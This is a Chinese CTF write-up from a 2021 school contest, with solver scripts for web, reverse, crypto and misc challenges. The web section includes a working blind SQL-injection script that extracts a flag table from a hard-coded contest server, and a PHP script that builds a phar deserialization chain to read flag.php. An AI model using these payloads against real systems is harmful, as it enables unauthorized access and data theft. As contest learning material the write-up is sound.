2021秋季赛部分wp

前言

震惊!平平无奇的web手,竟然把crypto ak了,顺带做了2个re和几个misc。。。

校赛感觉难度一般,就是给入门的做了,暑假学的好多都用上了,感觉不错。不过持续时间太长了,直接7天,而且国庆那几天贼忙,部门、工作室、新生······时间不是很合理,最后几天直接摆烂了,一个题也没做。

Web

web4

无列名注入,和寒假赛的类似

库名还是cumtctf

爆表名得到flag_table_1

无列名注入得到flag,需要变成小写

import requests
import time

url = 'http://81.69.241.44:25500/index.php'
headers = {
    'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0'
}
# Candidate alphabet for the commented-out search below; the active loop
# further down iterates chr(32..125) instead, so `s` and `table` are unused there.
s = "-{abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789,_!@#$%^&*()}"
table = ''

# Earlier stages of the solve, kept as inert string literals (they never execute).
"""
for i in range(1,1000):
for j in s:
time.sleep(0.1)
payload = "1'/**/||/**/!(ascii(mid((select/**/group_concat(table_name)/**/from/**/mysql.innodb_table_stats/**/where/**/!(database_name<>'cumtctf')),{},1))<>ascii('{}'))#".format(i, j)
data = {
'username': payload,
'password': '1'
}
res = requests.post(url=url, headers=headers, data=data).text
if res.find('good') != -1:
table += j
print(table)
break

"""

"""
payload2 = "1'/**/||/**/!(mid((select/**/group_concat(table_name)/**/from/**/mysql.innodb_table_stats/**/where/**/!(database_name<>'cumtctf')),1,34)<>'address,email,flag_table_1,users')#;"
data = {
'username': payload2,
'password': '1'
}
res = requests.post(url=url, headers=headers, data=data).text
"""

"""
payload3 = "1'/**/||/**/(1,1)>(select/**/*/**/from/**/flag_table_1/**/limit/**/0,1)#;"
data = {
'username': payload3,
'password': '1'
}
res = requests.post(url=url, headers=headers, data=data).text
print(res)
"""

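def trans(flag):
    """Return ``flag`` as a single ``0x``-prefixed hex literal, two hex digits per character.

    Args:
        flag: the string to encode; ``''`` yields ``'0x'``.

    Returns:
        ``'0x'`` followed by the concatenated hex of each character's ordinal.
        The original concatenated ``hex(ord(ch))`` fragments, which emits a single
        digit for ordinals below 16 and therefore produced odd-length (invalid) hex
        for such characters; ``02x`` zero-pads them. Output is identical for
        ordinals 16..255 (the caller only passes 32..125); ordinals above 255
        still emit more than two digits, as before.
    """
    return '0x' + ''.join(format(ord(ch), '02x') for ch in flag)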
flag = ''
# Position-by-position search over printable ASCII 32..125; every probe is one
# HTTP POST to the hard-coded `url`, throttled by `time.sleep`. The outer loop
# has no stop condition: it always runs its 499 rounds.
for i in range(1,500):
    time.sleep(0.01)
    hexchar = ''
    for char in range(32, 126):
        # for j in s:
        hexchar = trans(flag+ chr(char))
        payload = "0'||/**/if((select/**/(0,{})>(select/**/*/**/from/**/flag_table_1/**/limit/**/0,1)),1,0)#".format(hexchar)
        data = {
            'username': payload,
            'password': ''
        }
        # `headers` from the top of the script is not passed here (only url and data).
        r = requests.post(url=url, data=data).text
        if r.find('good') != -1:
            # Appends the previous candidate (char-1), not `char` itself.
            flag += chr(char-1)
            # flag += j
            print(flag)
            break

web5

phar反序列化

先通过任意文件读取获得class file fun class这些php文件,代码审计

构造pop链,生成phar文件

看到已经有其他队伍把这题做出来了,此时先测试看看能不能连上别的队伍上传成功的文件,根据file.php中对文件名的处理,随便测试了几个,发现phar.jpg处理后的文件路径能用,获得flag

下面贴上自己写的

<?php

/**
 * Plain data holder with two public, initially unset properties.
 */
class File {
    /** @var mixed */
    public $fakefile, $file;
}

/**
 * Plain data holder with three public, initially unset properties.
 */
class Docker {
    /** @var mixed */
    public $str, $container1, $container2;
}
/**
 * Holder whose private $value is fixed by the constructor; $docker is public and unset.
 */
class Cloud {
    /** @var string set once in the constructor */
    private $value;
    /** @var mixed */
    public $docker;

    public function __construct() {
        $this->value = "/var/www/html/flag.php";
    }
}
// Build the object graph that will be stored as the archive's metadata.
$File = new File();
$docker = new Docker();
$cloud = new Cloud();

// NOTE(review): inside a PHP single-quoted string the backslashes below are literal
// characters, so as printed this is not a well-formed serialized string; it looks
// like markup escaping from the blog renderer — confirm against the original script.
$cloud->docker = 'O\:6\:\"Docker\"\:3\:\{s\:3\:\"str\"\;s\:4\:\"haha\"\;s\:10\:\"container1\"\;s\:4\:\"haha\"\;s\:10\:\"container2\"\;s\:4\:\"haha\"\;\}';
$File->file = $docker;
$docker->str = $cloud;


// Write the archive; the metadata is the serialised $File graph.
$phar = new Phar("phar.phar");
$phar->startBuffering();
// NOTE(review): the stub ends in "? >" (with a space); that is probably a rendering
// artifact for "?>" — confirm before relying on this listing.
$phar->setStub('<?php __HALT_COMPILER(); ? >');
$phar->setMetadata($File);
$phar->addFromString("test.txt", "test");
$phar->stopBuffering();
?>

Re

签到

直接拖到ida里,得到flag

net

拖到ILSpy里,获得逆向代码

简单写个脚本

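def ppp(a, b, c):
    """Return ``a ** b mod c`` by right-to-left binary exponentiation.

    Args:
        a: base; reduced mod ``c`` before use.
        b: non-negative integer exponent.
        c: modulus; ``c == 0`` raises ZeroDivisionError from the first ``%``.

    Returns:
        ``a ** b mod c`` for ``b > 0``; ``1`` when ``b == 0`` (even for ``c == 1``,
        matching the original).

    Raises:
        ValueError: if ``b`` is negative. The original looped forever in that case,
        because ``b >>= 1`` never reaches 0 for a negative ``b``.
    """
    if b < 0:
        raise ValueError("exponent must be non-negative")
    result = 1
    base = a % c
    while b:
        if b & 1:
            result = result * base % c
        b >>= 1
        base = base * base % c
    return result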

# Target values, one per flag character (taken from the decompiled program, per the writeup).
array2 = [
    30361, 550, 595, 15412, 30361, 15412, 8346, 27071, 37594, 37534,
    9781, 1082, 19619, 9781, 1082, 15513, 29591, 19596, 30078, 27942,
    25366, 29107, 7433, 28493, 9781, 29591, 2664, 12540,
]

# For every target, the smallest i < 100000 with i**377 % 38009 == target;
# a target with no such i is skipped silently.
test = []
for target in array2:
    for candidate in range(100000):
        if ppp(candidate, 377, 38009) == target:
            test.append(candidate)
            break

# Print the recovered values under each of 100 constant shifts; one of the
# lines reads as the flag.
for shift in range(100):
    print(''.join(chr(value - shift) for value in test), end='')
    print('\n')

跑出flag

Crypto

签到

简单写个脚本爆破

flag = ''
table = 'abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ'
# Affine parameters: E(i) = (a*i + b) mod c over the 52-letter table.
a = 37
b = 23
c = 52
"""
def affine(m,a,b,c):
chipher=''
for i in range(len(m)):
if m[i] in table:
chipher+=table[(a*(table.find(m[i]))+b)%c]
else:
chipher+=m[i]
return chipher
"""

t = 'aoxL{Fw0_TXk_y3xtW_ZP_TCBg7VLCxGwb}'

# Invert the map once (ciphertext letter -> plaintext letter) instead of
# scanning the table for every character; a=37 is coprime to 52, so it is a bijection.
_decode = {table[(a * idx + b) % c]: letter for idx, letter in enumerate(table)}

# Non-table characters (digits, braces, underscores) pass through unchanged.
for ch in t:
    flag += _decode.get(ch, ch)
    print(flag)



lcg

从网上找了个脚本,写得很详细

https://blog.csdn.net/superprintf/article/details/108964563

from Crypto.Util.number import *
"""
flag = ''.encode()

seed = bytes_to_long(flag)

print(seed)

length = seed.bit_length()

print(length)

n=getPrime(length)
a=getPrime(length)
b=getPrime(length)
s=[]


for i in range(10):
seed = (a*seed+b)%n
s.append(seed)

print(s)
"""

from Crypto.Util.number import *
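def gcd(a,b):
    """Euclid's algorithm, iterative.

    Returns the same value as the recursive original — including its sign
    behaviour, where negative inputs can yield a negative result (callers
    here apply ``abs`` afterwards) — but without the recursion-depth limit,
    which the several-hundred-bit operands this script feeds it could hit.
    """
    while b != 0:
        a, b = b, a % b
    return a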
s=[64053834035066785058511795263859088093402576718387054930069870694827422995248363210875296865931156540418540088656840163752864867889701529, 62747878069691338351001678737533032651009187924993079609551517187402239263500990458468121965725468864035542647616568888614971291913860683, 8610389166165547798963079074461089122942923569827711232062490735297527674581120584017030806864406444034839689358368567214353599295961192, 67368398051089407366868405625671942347378755129423872678285919732014302509367453094142041707571135936337763803644340301362544880144675515, 3140546334522640626644397935274312967014650101920766829848908314358452633165879115222769049730993718556007257838431843662986174886332684, 86570894867827558107244361752089586436766881136739525172025909326268148819720261812567282066327259810017581923500053674785415315313293458, 74270633946662538117925791534180331044438757906314082041974053142483165604719102121031974214138125154407150853174565679126633465007917723, 82222345180880564316408536364709779418528442531150999715627704885024880160675971236916036110841803202987616501846568355385621016171784903, 79833541796675422937999973936505826001046326324194169378072775519666431460490483847928549009565561011528302879850550395115321828798479473, 70276250399219459795079058514491950109021040664671993784167534811426903455184545174600178849521746939676479421177456528336980088529680364]
# Consecutive differences of the outputs. NOTE: range(9) starts at i=0, so
# t[0] is s[0]-s[-1] == s[0]-s[9] (Python wraps negative indexes) — a spurious
# entry; t[1..8] are the real differences.
t = []
for i in range(9):
    t.append(s[i]-s[i-1])
# Modulus candidates from gcd(t[i+1]*t[i-1]-t[i]^2, t[i+2]*t[i]-t[i+1]^2).
# i=0 again wraps to t[-1] == t[8], so all_n[0] is likewise spurious; the
# loop below only filters out candidates equal to 1.
all_n = []
for i in range(7):
    all_n.append(gcd((t[i+1]*t[i-1]-t[i]*t[i]), (t[i+2]*t[i]-t[i+1]*t[i+1])))

# Modular inverse of A mod n via extended Euclid; appears to return -1 when no
# inverse exists (that sentinel is never checked below, so a non-invertible
# candidate just prints garbage rather than failing). pow(A, -1, n) is the
# Python 3.8+ equivalent.
MMI = lambda A, n,s=1,t=0,N=0: (n < 2 and t%N or MMI(n, A%n, t, s-A//n*t, N or n),-1)[n<1] # modular inverse
for n in all_n:
    n=abs(n)
    # Only the trivial candidate is skipped; a 0 candidate would raise ZeroDivisionError below.
    if n==1:
        continue
    # Recover a from two consecutive differences, then b, then step the
    # recurrence back once from s[0] to obtain the seed.
    a=(s[2]-s[1])*MMI((s[1]-s[0]),n)%n
    ani=MMI(a,n)
    b=(s[1]-a*s[0])%n
    seed = (ani*(s[0]-b))%n
    plaintext=seed
    print(long_to_bytes(plaintext))

Dear Alice

google ctf 2021原题

https://github.com/Haorical/Wargames/tree/master/google-2021/h1

嫖到脚本

import os
import hashlib
from cryptography.hazmat.backends import default_backend
from cryptography.hazmat.primitives import padding
from cryptography.hazmat.primitives.ciphers import Cipher, algorithms, modes


# Identity element: Add() and Double() treat any point with z == 0 as the identity.
INF = (1, 1, 0)

# Signing private key consumed by Sign() — Sign() also prints it (debug output).
d = 311315114987715623444276142623839583360207853110657101019745009424926710590583360123029204556690633449715530612380512577293882572730509350735778781050933

# Field modulus; every coordinate operation below is reduced mod this
# (presumably prime — pow(z, -2, mod) in Sign/Verify requires z invertible).
mod = 8948962207650232551656602815159153422162609644098354511344597187200057010413552439917934304191956942765446530386427345937963894309923928536070534607816947
# Curve coefficient used in Double()'s slope term (3*x^2 + a*z^4).
a = 6294860557973063227666421306476379324074715770622746227136910445450301914281276098027990968407983962691151853678563877834221834027439718238065725844264138
# Second curve coefficient; not referenced by any of the arithmetic below.
b = 3245789008328967059274849584342077916531909009637501918328323668736179176583263496463525128488282611559800773506973771797764811498834995234341530862286627
# Scalar modulus for the signature arithmetic (k, u1, u2, r, s are reduced mod n)
# and the bit length Transform() truncates hashes to — presumably the order of G.
n = 8948962207650232551656602815159153422162609644098354511344597187200057010413418528378981730643524959857451398370029280583094215613882043973354392115544169
# Base point as (x, y, z); Sign/Verify recover the affine x as x * z^-2 mod `mod`.
G = (5139617820728399941653175323358137352238277428061991823713659546881441331696699723004749024403291797641521696406798421624364096550661311227399430098134141,
1798860115416690485862271986832828064808333512613833729548071279524320966991708554765227095605106785724406691559310536469721469398449016850588110200884962,
5042518522433577951395875294780962682755843408950010956510838422057522452845550974098236475624683438351211176927595173916071040272153903968536756498306512)

def Double(p):
    """Double the point p = (x, y, z) in projective coordinates mod `mod`.

    The x * z^-2 conversion used by Sign/Verify suggests Jacobian coordinates.
    Returns INF when p is the identity (z == 0) or when y == 0 (vertical
    tangent). Reads the curve coefficient `a` from module scope.
    """
    x, y, z = p
    if z == 0 or y == 0:
        return INF
    ysqr = y * y % mod
    zsqr = z * z % mod
    s = 4 * x * ysqr % mod                     # 4*x*y^2
    m = (3 * x * x + a * zsqr * zsqr) % mod    # 3*x^2 + a*z^4, the slope numerator
    x2 = (m * m - 2 * s) % mod
    y2 = (m * (s - x2) - 8 * ysqr * ysqr) % mod
    z2 = 2 * y * z % mod
    return x2, y2, z2

def Add(p, q):
    """Add two points in the same projective coordinates as Double().

    z == 0 marks the identity, so if either operand is the identity the other
    is returned. When the scaled x-coordinates coincide (u1 == u2) the points
    are either inverses (-> INF) or equal (-> Double(p)).

    Note on `h = u2 - u1 % mod` and `r = s2 - s1 % mod`: these parse as
    `u2 - (u1 % mod)`; u1 and s1 are already reduced, so h and r may be
    negative here. Every later use is reduced mod `mod`, so the result is
    unaffected, but `(u2 - u1) % mod` is what was meant.
    """
    if p[2] == 0:
        return q
    if q[2] == 0:
        return p
    x1, y1, z1 = p
    x2, y2, z2 = q
    z1sqr = z1 * z1 % mod
    z2sqr = z2 * z2 % mod
    u1 = x1 * z2sqr % mod
    u2 = x2 * z1sqr % mod
    s1 = y1 * z2 * z2sqr % mod
    s2 = y2 * z1 * z1sqr % mod
    if u1 == u2:
        if s1 != s2:
            return INF
        else:
            return Double(p)
    h = u2 - u1 % mod
    hsqr = h * h % mod
    hcube = hsqr * h % mod
    r = s2 - s1 % mod
    t = u1 * hsqr % mod
    x3 = (r * r - hcube - 2 * t) % mod
    y3 = (r * (t - x3) - s1 * hcube) % mod
    z3 = h * z1 * z2 % mod
    return x3, y3, z3

def Multiply(p, x):
    """Scalar-multiply point p by the non-negative integer x (double-and-add, LSB first).

    Returns INF unchanged when p is the INF tuple. Uses Add/Double from module scope.
    """
    if p == INF:
        return p
    acc = INF
    while x:
        if x & 1:
            acc = Add(acc, p)
        p = Double(p)
        x >>= 1
    return acc

def Transform(m, l):
    """Truncate an l-bit hash value m to n.bit_length() bits by dropping its low bits.

    When l <= n.bit_length(), m is returned unchanged.
    """
    excess = l - n.bit_length()
    return m >> excess if excess > 0 else m

def RNG(nbits, a, b):
    """Return a * sum_i(B[i] * b**i) mod 2**nbits, with B = nbits//8 bytes from os.urandom.

    The output is a fixed linear function of the random bytes with multiplier
    `a` and radix `b`, not the bytes themselves. NOTE(review): with b = 2**32
    (as Sign() passes), the terms for i >= nbits/32 vanish mod 2**nbits, so far
    fewer than nbits bits of entropy reach the output; kept as the challenge
    defines it.
    """
    raw = os.urandom(nbits // 8)
    acc = 0
    for i, byte in enumerate(raw):
        acc += byte * b ** i
    return a * acc % 2 ** nbits

def Sign(msg, d):
    """Produce an ECDSA-style signature (r, s) over msg with private scalar d.

    z is SHA-512(msg) truncated by Transform(); k comes from RNG() with
    multiplier 0x01010101 and radix 2**32. Prints d, z, k, r, s and the two
    factors of s — debug output that, outside a CTF solver, would leak the
    private key and nonce. Asserts s was formed from the printed factors.
    """
    digest = hashlib.sha512(msg)
    z = Transform(int.from_bytes(digest.digest(), 'big'), digest.digest_size*8)
    print('d = ', d)
    print('z = ', z)
    k = RNG(n.bit_length(), 16843009, 4294967296)
    print('k = ', k)
    x1, _, z1 = Multiply(G, k)
    r = (x1 * pow(z1, -2, mod) % mod) % n
    k_inv = pow(k, -1, n)
    s = k_inv * (z + r * d) % n
    print('r = ', r)
    print('s = ', s)
    print('left = ', k_inv % n)
    print('right = ', (z + r * d) % n)
    assert int(s) == k_inv * (z + r * d) % n
    return r, s

def Verify(msg, Q, r, s):
    """Check an ECDSA-style signature (r, s) on msg against public point Q.

    Returns True when the x-coordinate of u1*G + u2*Q reduced mod n equals r.
    There is no range check on r or s (1 <= r, s < n), and if the point sum is
    the identity (z1 == 0) the pow(z1, -2, mod) call raises ValueError instead
    of returning False.
    """
    digest = hashlib.sha512(msg)
    z = Transform(int.from_bytes(digest.digest(), 'big'), digest.digest_size*8)
    s_inv = pow(s, -1, n)
    u1 = z * s_inv % n
    u2 = r * s_inv % n
    x1, _, z1 = Add(Multiply(G, u1), Multiply(Q, u2))
    return r == (x1 * pow(z1, -2, mod) % mod) % n

def Encrypt(plaintext, x):
    """AES-ECB-encrypt plaintext (bytes) under the key SHA-256(str(x)), PKCS#7-padded.

    ECB exposes repeated blocks and provides no integrity; it is kept only
    because the challenge is defined this way.
    """
    key = hashlib.sha256(str(x).encode()).digest()
    aes = algorithms.AES(key)
    padder = padding.PKCS7(aes.block_size).padder()
    padded = padder.update(plaintext) + padder.finalize()
    encryptor = Cipher(aes, modes.ECB(), default_backend()).encryptor()
    return encryptor.update(padded) + encryptor.finalize()

def Decrypt(ciphertext, x):
    """Inverse of Encrypt(): AES-ECB-decrypt ciphertext under SHA-256(str(x)) and strip PKCS#7 padding.

    A wrong key (or a length that is not a block multiple) surfaces as a
    ValueError from the cryptography layer.
    """
    key = hashlib.sha256(str(x).encode()).digest()
    aes = algorithms.AES(key)
    decryptor = Cipher(aes, modes.ECB(), default_backend()).decryptor()
    raw = decryptor.update(ciphertext) + decryptor.finalize()
    unpadder = padding.PKCS7(aes.block_size).unpadder()
    return unpadder.update(raw) + unpadder.finalize()

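# Of the captured triple only the third value (the ciphertext as an integer) is used.
_, _, ca = (8832295267397231051293216564016639537146222596144354850230682204978731311879255662259663270183445827348338041752369314181111940713714991119349376636404112, 8683784208731634307361157916911868656279723101808163939313971801256736484458199874570532609285522391139002296248059424750941962344918156540408403221858292, 105398535464409171419472607677747462033030589690350997911381059472020486557672504778060748058626707326992258591478040500759349352824508941100030623708235493999018571171774658661651532338275358740821547158517615704187173346885098836066743736788259192831313414309775979590033581301910426314601982482556670097620)

# Candidate key values, tried in turn.
ka = [
    0x8a6e81a10c229af504772b51c502638820811034faa62b8dafa019210347918419b71d0638c89b59026b7611edc6a14b2c1c1fb1092a352adfffb7e114f4f385,
    0x3f837315a1fb46097f5eb680697901d75758b859846d37cad33d3f464efb84ace1e85fc60f4e445a031b5ca0e4965e0b081bd4a6e8efea1d3ba07aad51a70cd
]
ca = ca.to_bytes(byteorder='big', length=(ca.bit_length() + 7) // 8)

for k in ka:
    # A wrong candidate fails PKCS#7 unpadding, which cryptography reports as
    # ValueError; only that is swallowed. The original bare `except: pass` also
    # hid KeyboardInterrupt and any programming error in Decrypt.
    try:
        recv_msg = Decrypt(ca, k)
    except ValueError:
        continue
    print(recv_msg)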

ElGamal

import gmpy2
# NOTE: Python 2 syntax (print statements, str.decode('hex')); it does not run unchanged on Python 3.
# The file handle is never closed; a `with open(...)` block would fix that.
data = open('./output.txt').read().split('\n')
# NOTE(review): eval() executes whatever output.txt contains. For a plain tuple
# of integers ast.literal_eval(data[0]) parses it without that risk — left as-is
# because the exact format of output.txt is not shown here.
g, h, A, B, p, q = eval(data[0])

c1, c2 = eval(data[1])
c1_, c2_ = eval(data[2])

# tmp = c2^A * h^B * c2_^-1  (mod p)
tmp = gmpy2.powmod(c2, A, p) * gmpy2.powmod(h, B, p) * gmpy2.invert(c2_, p)
tmp = tmp % p

print 't=', tmp
print 'A=', A
print 'p=', p
# Extended gcd: gg == x*(A-1) + y*(p-1). Presumably tmp is m^(A-1) mod p and,
# when gg == 1, raising it to x undoes that exponent — confirm against the challenge.
gg, x, y = gmpy2.gcdext(A - 1, p - 1)
print gg

m = gmpy2.powmod(tmp, x, p)
# Render the recovered integer's hex digits as raw bytes (Python 2 str.decode('hex')).
print hex(m)[2:].decode('hex')

Misc

签到

base32解码

LSB

zsteg直接出

加密

百度识图,福尔摩斯,搜索发现跳舞的小人

发现提示信息http://330k.github.io/misc_tools/unicode_steganography.html

密码文件虽然空白但是占用空间很大,用上面的工具

最后16进制转字符串得到flag

社工

扫描机票上的条形码即可,属于pdf417,m1后面就是姓名

https://online-barcode-reader.inliteresearch.com/